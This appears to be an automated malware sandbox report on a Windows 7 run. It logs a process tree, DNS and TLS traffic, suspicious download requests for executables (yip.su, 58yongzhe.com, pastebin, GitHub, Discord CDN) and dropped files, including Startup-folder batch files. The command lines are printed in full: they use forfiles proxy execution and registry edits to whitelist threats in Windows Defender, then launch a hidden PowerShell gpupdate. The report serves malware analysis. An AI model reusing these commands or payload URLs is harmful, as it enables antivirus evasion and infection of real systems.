Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Aug. 12, 2024, 9:13 a.m. | Aug. 12, 2024, 10:02 a.m. |
Process Tree

- cmd.exe (PID 2912): "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  - forfiles.exe (PID 2996): forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
  - forfiles.exe (PID 2148): forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
  - forfiles.exe (PID 1284): forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
  - forfiles.exe (PID 1440): forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
  - forfiles.exe (PID 2780): forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
- gpupdate.exe (PID 2468): "C:\Windows\system32\gpupdate.exe" /force
Name | Response | Post-Analysis Lookup |
---|---|---|
yip.su | 172.67.169.89 | |
cacerts.digicert.com | CNAME fp2e7a.wpc.phicdn.net, 152.195.38.76 | |
pastebin.com | 104.20.4.235 | |
raw.githubusercontent.com | 185.199.111.133 | |
58yongzhe.com | 178.22.31.113 | |
github.com | 20.200.245.247 | |
cdn.discordapp.com | 162.159.134.233 | |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49168 -> 172.67.169.89:443 | C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | 54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca |
TLS 1.2 192.168.56.103:49170 -> 162.159.133.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=discordapp.com | 97:8b:ee:ad:1e:bf:a1:69:e7:94:29:f7:55:7a:29:64:19:c7:81:39 |
TLS 1.2 192.168.56.103:49165 -> 104.20.3.235:443 | C=US, O=Google Trust Services, CN=WE1 | CN=pastebin.com | 82:49:c5:04:9a:bd:a9:c1:ab:4d:ff:95:b9:94:74:cc:40:bc:09:7f |
TLS 1.2 192.168.56.103:49167 -> 20.200.245.247:443 | C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA | CN=github.com | e7:03:5b:cc:1c:18:77:1f:79:2f:90:86:6b:6c:1d:f8:df:aa:bd:c0 |
TLS 1.2 192.168.56.103:49171 -> 185.199.111.133:443 | C=US, O=DigiCert Inc, CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | 97:d8:c5:70:0f:12:24:6c:88:bc:fa:06:7e:8c:a7:4d:a8:62:67:28 |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://194.58.114.223/d/385121 |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://58yongzhe.com/parts/setup1.exe |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://pastebin.com/raw/xYhKBupz |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://github.com/evan9908/Setup/raw/main/222fastsetup.exe |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://cdn.discordapp.com/attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099& |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://yip.su/RNWPd.exe |
request | GET http://194.58.114.223/d/385121 |
request | GET http://58yongzhe.com/parts/setup1.exe |
request | GET http://cacerts.digicert.com/DigiCertGlobalRootG2.crt |
request | GET https://pastebin.com/raw/xYhKBupz |
request | GET https://github.com/evan9908/Setup/raw/main/222fastsetup.exe |
request | GET https://cdn.discordapp.com/attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099& |
request | GET https://yip.su/RNWPd.exe |
file | C:\Users\test22\AppData\Local\Temp\7zS5F7B.tmp\Install.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CtR52JA5gkRmkrw4WjnncBWq.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bPR52zbYKzlnTUwhlGwv3UGk.bat |
file | C:\Users\test22\AppData\Local\Z8SHBnj525WmwLcm3I5TEMZZ.exe |
file | C:\Users\test22\AppData\Local\VYs7aogGIrLCpxX1KYEaoAL7.exe |
file | C:\Users\test22\Pictures\uzJnASoMj3qwVnDCe7c6jzSi.exe |
file | C:\Users\test22\AppData\Local\Temp\7zS5C4F.tmp\Install.exe |
file | C:\Users\test22\Pictures\kkvKu24VMv4qXlO8rQfFfuQd.exe |
file | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell start-process -WindowStyle Hidden gpupdate.exe /force |
cmdline | forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | cmd /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | /C powershell start-process -WindowStyle Hidden gpupdate.exe /force |
file | C:\Users\test22\AppData\Local\VYs7aogGIrLCpxX1KYEaoAL7.exe |
file | C:\Users\test22\AppData\Local\Z8SHBnj525WmwLcm3I5TEMZZ.exe |
wmi | <INVALID POINTER> |